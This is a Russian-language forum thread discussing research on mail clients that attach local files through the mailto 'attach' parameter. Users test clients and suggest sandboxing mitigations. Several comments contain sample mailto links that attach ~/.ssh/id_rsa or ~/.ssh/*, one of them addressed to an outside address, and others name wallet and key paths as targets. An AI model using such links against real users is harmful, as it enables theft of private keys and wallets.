The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Атака на пользователей почтовых клиентов при помощи ссылок 'mailto:'"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Атака на пользователей почтовых клиентов при помощи ссылок 'mailto:'"  +/
Сообщение от opennews (?), 19-Авг-20, 14:41 
Исследователи из Рурского университета в Бохуме (Германия) проанализировали (PDF) поведение почтовых клиентов при обработке ссылок "mailto:" с расширенными параметрами. Пять из двадцати рассмотренных почтовых клиентов оказались уязвимы для атаки, манипулирующей подстановкой ресурсов при помощи параметра "attach". Ещё шесть почтовых клиентов были подвержены  атаке по замене ключей PGP и S/MIME, а три клиента оказались уязвимы для атаки по извлечению содержимого зашифрованных сообщений...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=53570

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от jfdbngh (?), 19-Авг-20, 14:41   +14 +/
Если каждый китаец наберет случайную строку на клавиатуре, то с 99% вероятностью получится эксплоит.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #2

2. Сообщение от DeerFriend (?), 19-Авг-20, 14:45   –2 +/
Господин Трамп может подтвердить, что у них уже получилось.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

3. Сообщение от Аноним (3), 19-Авг-20, 14:46   +2 +/
>Пять из двадцати рассмотренных почтовых клиентов

Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #15, #18, #20, #23, #26, #28, #31, #68

4. Сообщение от Аноним (4), 19-Авг-20, 14:51   +/
> путь_к_файлу

И какой путь?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #5, #16

5. Сообщение от Аноним (5), 19-Авг-20, 14:53   +1 +/
~/.bitcoin/wallet.dat
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #6, #8

6. Сообщение от Аноним (4), 19-Авг-20, 14:54   –3 +/
А если нет такого?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #7

7. Сообщение от Ag (ok), 19-Авг-20, 14:56   +13 +/
На значит на этой машине не повезло, ждем-с другую. Интернет-с - он большой.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #9, #12

8. Сообщение от Аноним (4), 19-Авг-20, 14:57   –3 +/
И такого нет

~/.ssh/id_rsa

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #11, #66

9. Сообщение от Аноним (4), 19-Авг-20, 14:59   –4 +/
Так это глупо - отвечать на письма от незнакомых адресатов. Их в спам помещают или игнорируют.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #19, #53

10. Сообщение от yet another anonymous (?), 19-Авг-20, 15:01   +2 +/
html в почте --- плохо. Нелокальное действие при обработке содержимого --- не плохо, а альтернативноодарённо.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #13

11. Сообщение от Иваня (?), 19-Авг-20, 15:01   –2 +/
~$ cat ~/.ssh/id_rsa
cat: /home/Иваня/.ssh/id_rsa: No such file or directory

~$ cd ~/.ssh/id_rsa
bash: cd: /home/Иваня/.ssh/id_rsa: No such file or directory

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #27

12. Сообщение от Аноним (4), 19-Авг-20, 15:01   +1 +/
> Thunderbird позволяет прикреплять группы файлов

И глупо отправлять послание, не взглянув на окошко со списком вложений.

Так что проблема скорее не реализации и не протокола даже, а опять социальная.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #78

13. Сообщение от Аноним (4), 19-Авг-20, 15:02   +2 +/
По умолчанию отключено.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

14. Сообщение от Анонимemail (14), 19-Авг-20, 15:10   –2 +/
Вывод, как минимум, не хранить важных данных в стандартных каталогах
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #34, #35

15. Сообщение от Аноним (15), 19-Авг-20, 15:10   –1 +/
mailx
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

16. Сообщение от Аноним (15), 19-Авг-20, 15:13   +2 +/
Страдание путь твой, человек.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

17. Сообщение от тоже Анонимemail (ok), 19-Авг-20, 15:14   +4 +/
Создал файл со ссылкой
mailto:?to=user@example.com&subject=Title&body=Text&att...
Щелкнул. Открылся Thunderbird, подставил Title и Text... и не прикрепил никаких вложений, хотя такой файл есть.
Версия 68.10 - по информации в статье, "уязвимая".
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #25, #32, #63

18. Сообщение от жека воробьев (?), 19-Авг-20, 15:16   –6 +/
outlook
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #21, #22, #107

19. Сообщение от жека воробьев (?), 19-Авг-20, 15:17   +4 +/
тут не про отвечать, а про ссылки mailto
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

20. Сообщение от Аноним84701 (ok), 19-Авг-20, 15:23   +1 +/
>>Пять из двадцати рассмотренных почтовых клиентов
> Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.

Claws-то чем провинился?
> O2: Drafts are saved unencrypted even though encryption is enabled
> E1: The attach parameter of mailto URIs is not supported.
>

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #59, #106

21. Сообщение от Аноним84701 (ok), 19-Авг-20, 15:25   +1 +/
> outlook
> R4: Certificates are automatically imported, thereby replacing old ones
> что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.

Так себе "альтернатива".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

22. Сообщение от Перастеросemail (ok), 19-Авг-20, 15:29   –2 +/
аутглюк, аут!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

23. Сообщение от Аноним (23), 19-Авг-20, 15:42   +1 +/
aerc
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #33

24. Сообщение от Аноним (23), 19-Авг-20, 15:44   –1 +/
Больше похоже на "браузеры не фильтруют параметры для почтовиков".
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #58

25. Сообщение от ss (??), 19-Авг-20, 15:54   +/
Может чтобы оно сработало надо плагин поставить?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #29

26. Сообщение от ss (??), 19-Авг-20, 16:07   –1 +/
Пишите!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

27. Сообщение от ss (??), 19-Авг-20, 16:11   +3 +/
Вы просто не участвуете соревновании. Спокойно игнорируйте :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

28. Сообщение от Аноним (28), 19-Авг-20, 16:16   –8 +/
Gmail
/thread
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

29. Сообщение от тоже Анонимemail (ok), 19-Авг-20, 16:21   +2 +/
> Может чтобы оно сработало надо плагин поставить?

Ага, предварительно скомпилировав.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #30

30. Сообщение от ss (??), 19-Авг-20, 16:22   –1 +/
Предварительно пропатчив авторскими фиксами после посылки багрепорта...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29 Ответы: #36

31. Сообщение от Алексей (??), 19-Авг-20, 16:52   +1 +/
KMail.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #109

32. Сообщение от Аноним (32), 19-Авг-20, 16:52   +1 +/
Мои эксперименты с kmail дали такой результат: оно действительно пытается приложить файл, но это всегда заканчивается ошибкой "файл не существует". Хотя я проверял на тех файлах, что 100% существуют и доступны.
При этом, в окне редактирования письма горит огромная красная надпись, что вложения были добавлены внешней программой, и нужно их проверить.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #37, #42

33. Сообщение от Siborgium (ok), 19-Авг-20, 17:18   –2 +/
Тормозное и глючное Goвно. Зря Drew DeVault изменил сишке, авось лучше бы получилось. Пользовался примерно неделю, вообще не понравилось. (neo)mutt, и тот лучше.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23

34. Сообщение от Siborgium (ok), 19-Авг-20, 17:29   –2 +/
OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #38, #40

35. Сообщение от Siborgium (ok), 19-Авг-20, 17:29   +/
Да и само ваше "решение" лечит в лучшем случае симптомы, а не проблему.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

36. Сообщение от Аноним (36), 19-Авг-20, 17:52   +7 +/
Да ну нфиг слишком сложно пишите просто сразу куда слать этот ~/.ssh/id_rsa файл?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30 Ответы: #108

37. Сообщение от sergey (??), 19-Авг-20, 18:03   +1 +/
Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #32 Ответы: #41

38. Сообщение от Michael Shigorinemail (ok), 19-Авг-20, 18:31   +/
Вас никто не заставляет ключи openssh держать в файлах с предсказуемыми именами (да и путями тоже).  Это превратит почти неинтерактивную атаку с одним-единственным элементом социнжиниринга ("лишь бы не заметил список приложений") в как минимум двухстадийную целенаправленную при необходимости её успеха -- сперва надо выкрасть ~/.ssh/config и посмотреть IdentityFile.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34 Ответы: #90

39. Сообщение от Michael Shigorinemail (ok), 19-Авг-20, 18:32   –1 +/
Ну вот, опять не вижу в списке mutt...
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #48, #95

40. Сообщение от Аноним84701 (ok), 19-Авг-20, 18:49   +1 +/
> OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?

Классическое решение:
запускать браузер от другого пользователя (например, <name>surfer), у которого доступ в "основной" ~ есть только в ~/downloads

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34 Ответы: #96

41. Сообщение от тоже Аноним (ok), 19-Авг-20, 19:25   +1 +/
> Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.

Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37 Ответы: #43, #52, #99

42. Сообщение от Bdfybec (?), 19-Авг-20, 19:32   +/
> вложения были добавлены внешней программой

Что за внешняя программа?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #32 Ответы: #54

43. Сообщение от Аноним (43), 19-Авг-20, 19:37   +3 +/
/root/.ssh/id_rsa
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #49

44. Сообщение от user (??), 19-Авг-20, 19:39   +1 +/
Это дыра в стандарте mailto.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #47

45. Сообщение от Аноним (45), 19-Авг-20, 19:39   +2 +/
>специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:<

вот это неприятно

Ответить | Правка | Наверх | Cообщить модератору

46. Сообщение от kusb (?), 19-Авг-20, 19:47   –3 +/
Для того, чтобы отправить файл на наш сервис переименуйте его в send.txt и расположите его в кoрнe диска "C:" согласившись при надобности с изменением расширения нажав кнопку "да" в диалоге (рис. 1).
В случае отсутствия диска C: на Windows системах необходимо первоначально создать его используя оснастку управления дисками или программу манипуляции разделами. Может потребоваться перезагрузка.
Если используется операционная система отличная от Windows, первоначально нужно создать католог аналогичный диску "C:" в корне системы, в случае unix-подобных систем вам, вероятно поможет следующая команда от суперпользователя (узнайте как запускать программы от суперпользователя в вашем случае):
mkdir /C:
В обычном случае достаточно ввести команду:
sudo mkdir /C: и ввести пароль (при вводе не отображается).
Используйте этот католог вместо диска "C:" поместив туда файл send.txt
После его использования католог "/С:" можно удалить так же, как и обычный католог, например введя команду rm C\:/, sudo rm C\:/ (В этом примере используется символ слеша для корректной работы.)

После расположения файла вам потребуется почтовый клиент поддерживающий нужную для данной задачи функциональность. Ознакомьтесь с нашим приложением 1 для проверки факта того, что клиент поддерживается.
Перейдите по ссылке: mailto:?to=send@enmlgateway.combody=Text&attach=C:/send... , после этого в окне почтового клиента в графе "заголовок" вы должны изменить заголовок на "Отправка файла, дата" где "дата" это сегодняшняя дата на момент отправки файла по Московскому времени (убедитесь, что текущая дата в вашем часовом поясе не отличается от московской, при необходимости скорректируйте).

Уведомление о принятии файла вы получите в течении трёх рабочих дней в виде ответного письма.

Известные проблемы:
Вложение не проходит - убедитесь, что ваш почтовый сервис пропускает вложения этого типа, убедитесь, что используется поддерживаемый почтовый клиент (см вложение 1), попробуйте изменить сервис и/или почтовый клиент.
Нет ответа о принятии файла или иные проблемы:
Воспрользуйтесь нашей технической поддержкой отправив письмо в офис.

Ответить | Правка | Наверх | Cообщить модератору

47. Сообщение от kusb (?), 19-Авг-20, 19:50   +3 +/
Почему дыра? Это часть стандарта?
Получается, что это заявленная возможность, так?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

48. Сообщение от kusb (?), 19-Авг-20, 19:51   +/
Консольные программы самые надёжные?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

49. Сообщение от тоже Аноним (ok), 19-Авг-20, 19:53   +1 +/
> /root/.ssh/id_rsa

Во-первых, это не мой. Во-вторых,
$ cat /root/.ssh/id_rsa
cat: /root/.ssh/id_rsa: Permission denied

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43

50. Сообщение от Аноним (50), 19-Авг-20, 19:55   –1 +/
Ыыыы... Какая прелесть!
Ответить | Правка | Наверх | Cообщить модератору

51. Сообщение от Аноним (51), 19-Авг-20, 19:59   +1 +/
как неожиданно!
Ответить | Правка | Наверх | Cообщить модератору

52. Сообщение от Аноним (52), 19-Авг-20, 20:06   +/
>Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #57

53. Сообщение от Аноним (53), 19-Авг-20, 20:07   +4 +/
Почему сразу "не знакомых"? А может знакомых. Может это какой-то магазин офигительных товаров и скидок куда пользователь пишет письмо т.к. на сайте написано "напишите нам и мы отправим вам товар". Пользователь пишет, ему в ответ приходит "ваш товар готов к отправке, вам удобно получить товар на этой или на следующей неделе" и вот в этом письме mailto.
Почему все думают что самые умные?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

54. Сообщение от Sluggard (ok), 19-Авг-20, 20:08   +/
Видимо, подразумевается программа, в которой открывалась ссылка «mailto:»  — она ведь передала параметр «attach».
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

55. Сообщение от timur.davletshinemail (ok), 19-Авг-20, 20:08   –1 +/
Стандартный Evolution из Debian stable прикрепляет и выводит в шапке письма предупреждение о том, что файл из скрытого каталога и может содержать приватную информацию. Т.е. сказать, что совсем об этом никто никогда не думал, нельзя.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #56

56. Сообщение от Аноним (45), 19-Авг-20, 20:13   +/
а не из скрытого что?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55 Ответы: #64

57. Сообщение от тоже Аноним (ok), 19-Авг-20, 20:18   +1 +/
> Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.

Ну, это же так несложно. Достаточно поправить данную мной выше ссылку прямо в браузере, щелкнуть... и убедиться, что оно таки по-прежнему не работает.
Хотя pwdx `pgrep thunderbird` таки показывает домашнюю папку текущего пользователя.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

58. Сообщение от Аноним (59), 19-Авг-20, 20:31   +2 +/
С какой стати они должны что-то фильтровать в URL?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #61

59. Сообщение от Аноним (59), 19-Авг-20, 20:35   +/
> The attach parameter of mailto URIs is not supported.

Как это not supported? Только что проверил: приаттачивает, но выводит об этом сообщение, которое невозможно не заметить. Ключик ssh аттачить отказался, мол potential private data leak.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #89

60. Сообщение от Анонннннннннн (?), 19-Авг-20, 20:39   +1 +/
Почтовик в контейнер, виртуалку, или пароль за запуск.
Ответить | Правка | Наверх | Cообщить модератору

61. Сообщение от Аноним (23), 19-Авг-20, 20:45   +/
Чтобы их пользователю не насовали интересного?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58 Ответы: #67

62. Сообщение от Аноним (62), 19-Авг-20, 21:03   +1 +/
Спалил контору =(((( ну по крайне мере последние лет 5 это стабильно работало. и да Хелло html2pdf, dompdf и рукожопы 97% ;)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #85

63. Сообщение от Аноним (63), 19-Авг-20, 21:24   +/
Mailspring (snap):
?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa could not be found, or has invalid file permissions.

Файл есть, а доступа нет. Я ничего не менял специально. К любым другим тоже не доступа у него.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #65, #74

64. Сообщение от timur.davletshinemail (ok), 19-Авг-20, 21:30   +2 +/
А так и было задумано... Вообще, я не вижу ничего критичного в таком поведении. Кнопку "Send" за меня оно не нажимает и ладно. Если пользователь настолько олень, что не смотрит, что отправляет, то это его личные проблемы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #56 Ответы: #81

65. Сообщение от анончик (?), 19-Авг-20, 21:55   +/
ну так оно ж в песочнице, это ж snap
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #75

66. Сообщение от Ilya Indigo (ok), 19-Авг-20, 22:26   +/
У нормальных пользоватедей давно уже
~/.ssh/id_ed25519_key
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #80

67. Сообщение от Аноним (59), 19-Авг-20, 22:38   +/
И что, им теперь надо научиться разбирать URL для всех схем со всеми возможными параметрами и начать подменять их?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61 Ответы: #105

68. Сообщение от Ilya Indigo (ok), 19-Авг-20, 22:44   –1 +/
Trojita к этому не уязвима, только что проверил!
А как на меня тут https://www.opennet.ru/openforum/vsluhforumID3/121309.html#17 косо смотрели...
Вход шли минусы и такие хипстерские выражения, как "минимальное чувство прекрасного" XD.
А оказалось это самый дырявый почтовый клиент. причём многие пользователи используют именно старую, однопотчную менее прожорливую версию. Вот так вот!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #76, #79

69. Сообщение от Kuromi (ok), 19-Авг-20, 23:25   –2 +/
*Facepalm*

А мне всегда казалочь что ну такие тривиальные дыры давно прикрыты. Наверное всем так казалось, поэтому никто их и не озаботился прикрыть.

С другой стороны, ссылок mailto вживую я лично не видел уже давно. Сейчас уже и почта-то - просто старомодной как-то.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #70, #82

70. Сообщение от Анонимemail (70), 20-Авг-20, 00:44   +5 +/
Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые ящики? Просто интересно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69 Ответы: #94

72. Сообщение от Аноним (72), 20-Авг-20, 03:33   +/
А поясните, пользователь сам потом отсылает письмо? Не автоматически же отсылается через mailto.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #73

73. Сообщение от Аноним (73), 20-Авг-20, 05:44   +1 +/
Да, поэтому там указано, что "пользователь может не заметить". То есть, может и заметить, а если бы уходило автоматически, то замечание не имело бы смысла.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72

74. Сообщение от iPony129412 (?), 20-Авг-20, 06:04   –1 +/
https://snapcraft.io/docs/environment-variables

HOME
This environment variable is re-written by snapd so that each snap appears to have a dedicated home directory that is a subdirectory of the real home directory.

Typical value: /home/_user_name_/snap/_snap_name_/_snap_revision_

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

75. Сообщение от iPony129412 (?), 20-Авг-20, 06:12   –1 +/
SNAP не обязует песочницу.

Да и у этого приложения есть вполне доступ ко всему хомяку пользователя
https://github.com/Foundry376/Mailspring/blob/master/snap/sn...

Просто пути поехавшие.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #65

76. Сообщение от iPony129412 (?), 20-Авг-20, 06:43   –1 +/
Ну так уязвимости в Thunderbird нет.
Это в линуксах обделались
https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68

77. Сообщение от iPony129412 (?), 20-Авг-20, 07:13   –1 +/
https://twitter.com/tsdgeos/status/1295493399638941696

Бомбануло у КДЕшника

Ответить | Правка | Наверх | Cообщить модератору

78. Сообщение от Атон (?), 20-Авг-20, 09:59   +/
Люди в это окошко не заглядывают даже когда сами добавили или должны были добавить аттач.

Конечно социальная инженерия. Бьет в цель наверняка.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

79. Сообщение от Атон (?), 20-Авг-20, 10:09   +/
Эк тебя задело..

Один только _одинаковый_ интерфейс пользователя на линуксе и виндовсе, примиряет с "прожорливостью".

Еще Thunderbird используют для совместимости.
Один профиль, простой и понятный, легко переносимый на флешке для линукса и виндовса.

В других почтовых клиентах дырявость еще не обнародовали а какая то там мнимая поточность вообще никого не волнует, кроме отмороженых хипстеров.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68

80. Сообщение от Атон (?), 20-Авг-20, 10:14   –1 +/
Поподробнее пожалуйста расскажите [a href=mailto:?to=fsb@nsa.gov&subject="Докладываю про нормальных пользователей подробнее"&body="Позвольте приложить список нормальных пользователей "&attach=~/.ssh/*]про нормальных пользователей[/a].  Очень интересно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #66

81. Сообщение от kusb (?), 20-Авг-20, 10:41   +/
Вот я не согласен, дело в том, что я не слишком ожидаю отправки файла почтовиком из моей файловой системы. Я скорее не хочу быть постоянно напряжённым работая с компьютером проверяя то, что предлагаемые функции не делают плохие вещи.
Так можно и в диалоге удаления файлов регулярку "*" по умолчанию подставлять, и запуск произвольной команды в стандарт mailto засунуть вместе с получением в аттаче файлов, которые вернёт эта команда и в веб-формы аналогичное поведение включить.
Это просто не слишком ожидается, как по мне. Я вероятно не слишком ожидаю, что плеер не будет трактовать открытие исполняемого файла как его запуск и не проверяю перед открытием видео или что программа выставит уже существующее имя файла в диалоге сохранения и молча перезапишет его, или при установке перезапишет биос на кривую версию, или Синаптик в диалоге установки программы реализует действие по умолчанию "установить Яндекс Бар".

Есть программа и то, что она делает. И есть то, над чем ты можешь не думать, потому что это не кажется её функциональностью. Если это почтовый клиент, то кому-то лучше думать о почте, или нет... а не о том, что она может отправить файл из файловой системы. Пусть даже она может, но ожидаемо ли это или нет?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #83, #87

82. Сообщение от iPony129412 (?), 20-Авг-20, 10:44   +/
> уже и почта-то - просто старомодной как-то

Нет.
Другое дело, что есть куча почтовых технологий устаревших, которые надо выкидывать

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69

83. Сообщение от kusb (?), 20-Авг-20, 10:48   +/
Ну ладно, может иногда и проверяю и в этом есть часть вранья. Про имя файла по умолчанию так вообще не уверен даже.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #81 Ответы: #84

84. Сообщение от kusb (?), 20-Авг-20, 10:50   +/
Ну ладно, Синаптиком я не пользуюсь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #83

85. Сообщение от Нечего (?), 20-Авг-20, 11:11   +/
Что если эволютион отправить в дев нуль что бы он не смог работать на мне , давно замечаю эту блоатварь которую не вызывал гуляющей по диспетчеру задач , ну ладно крон итд , а эта то гуляет зачем ? Я уж думаю линукс особенно убунточка исправится хотя бы на нашей территории если директором этого филиала буду я , а не яндекс который прибежал уже после.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62

86. Сообщение от Аноним (86), 20-Авг-20, 11:17   +/
firejail "Ваш любимый почтовый клиент"
Со списком для firejail куда клиенту можно ходить.
Ответить | Правка | Наверх | Cообщить модератору

87. Сообщение от timur.davletshinemail (ok), 20-Авг-20, 11:20   –1 +/
Берёшь apparmor профиль private-files-strict и запиливаешь его в качестве основы для своего любимого почтовика. Например, именно на его основе стоковый модуль для Evince режет доступ к каталогам gnupg, ssh, почты и чего-то, что я уже не помню.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #81

88. Сообщение от ИмяХ (?), 20-Авг-20, 11:57   –1 +/
У кухоных ножей есть опасная уязвимость - если злоумышленник ударит им человека, то человек получит серьёзную травму и даже может умереть. Почему производители ножей не устраняют эту уязвимость? Существующие сейчас правила безопасности - это лишь набор костылей, которые не дают должной защиты. Ведь любой может идти по улице и не заметить подкравшегося сзади злоумышленника.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #93

89. Сообщение от Аноним84701 (ok), 20-Авг-20, 12:03   +/
>> The attach parameter of mailto URIs is not supported.
> Как это not supported? Только что проверил: приаттачивает, но выводит об этом
> сообщение, которое невозможно не заметить.

У меня только сообщение "File doesn't exist or permission denied!". Даже если прописать в ссылке "/home/anon/существующий_файл".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #59

90. Сообщение от ALex_hha (ok), 20-Авг-20, 13:00   +1 +/
а шифрование приватого ключа - вообще делает такие атаки бессмысленными, от слова совсем
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38

91. Сообщение от microsoft (?), 20-Авг-20, 13:04   +/
Ура mutt выстоял, жаль сцраные html письма не переваривает
Ответить | Правка | Наверх | Cообщить модератору

92. Сообщение от Firecat (ok), 20-Авг-20, 18:13   –2 +/
Короче, безопасные клиенты;
Windows: W10 Mail, The Bat!
Linux: Trojitá, Mutt
macOS: Airmail
iOS: Mail App
Android: K-9 Mail, MailDroid
Ответить | Правка | Наверх | Cообщить модератору

93. Сообщение от Firecat (ok), 20-Авг-20, 18:23   +/
Вообще-то кухонный нож плох для таких целей, у него очень слабая проникающая способность по сравнению с боевыми и охотничьими ножами... Короче, уязвимость устранена до максимума возможного.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

94. Сообщение от Kuromi (ok), 20-Авг-20, 21:41   +/
> Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые
> ящики? Просто интересно

Смотря для чего - личное общение - разные IM, рабочее - Слаки и тому подобное. Пресловутые списки рассылки были вытеснены багзилламии гитхабами.

Впрочем, я не считаю что от емейла надо отказываться, но то что мир не стоит на месте - это точно.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70

95. Сообщение от PnD (??), 20-Авг-20, 22:30   +/
А он есть©
Но лучше посмотреть на стр.5 PDF т.к. в новости легенду забыли.
"Нет, не был, не состоял".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

96. Сообщение от Аноним (96), 20-Авг-20, 22:32   –1 +/
ага. типичный линуксокостыль - на каждый пук заводить по пользователю. зачёт. ещё и группу можно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #97

97. Сообщение от Michael Shigorinemail (ok), 20-Авг-20, 22:39   +/
> ага. типичный линуксокостыль

Нет, типичный ламер, не слышавший про privsep.

http://altlinux.org/hasher для запуска всякой недоверенной жути тоже некоторые коллеги применяют.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #96

98. Сообщение от economist (?), 20-Авг-20, 23:39   +1 +/
Щелкая по email - юзер хочет слать письмо, и должен быть уже настороже.

О том что вложились файлы - должно быть хорошо заметно в интерфейсе.

А что это секретные файлы - скажет расширение (в Thunderbird).

В нем же расширения говорят что получатель - из другого домена.

Наверно автоматом вкладывать файлы - не лучшая идея для протокола на обычный клик, но каких-то серьезных утечек - скорее всего не было.

Ответить | Правка | Наверх | Cообщить модератору

99. Сообщение от OpenEcho (?), 21-Авг-20, 02:07   +/
> Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.

$HOME/.ssh/id_rsa

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #100

100. Сообщение от тоже Аноним (ok), 21-Авг-20, 13:32   +/
> $HOME/.ssh/id_rsa

Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #99 Ответы: #101

101. Сообщение от OpenEcho (?), 21-Авг-20, 16:37   +/
>> $HOME/.ssh/id_rsa
> Это с какого бы перепугу функции файловой системы стали раскрывать переменные окружения?

Приехали...

Тильда ~ это не есть функция файловой системы. Это алиас шела, который банально прется в среду и извлекает содержимое НОМЕ, которое в свое время заполняется функцией getpwent() вытаскивя из /etc/passwd домашнюю директорию.

Зайдите в шел, сделайте следующее: export HOME=/etc; cd ~; pwd
и пугайтесь сами :)

Know your tool: http://www.gnu.org/software/bash/manual/html_node/Tilde-Expa...

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100 Ответы: #102

102. Сообщение от тоже Аноним (ok), 21-Авг-20, 17:33   +/
> Тильда ~ это не есть функция файловой системы. Это алиас шела

Который раскрывает, например, glob.
А если внимательно прочитать новость,
> Thunderbird позволяет прикреплять группы файлов по маске при помощи конструкций вида "attach=/tmp/*.txt".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #103

103. Сообщение от OpenEcho (?), 21-Авг-20, 22:41   +/
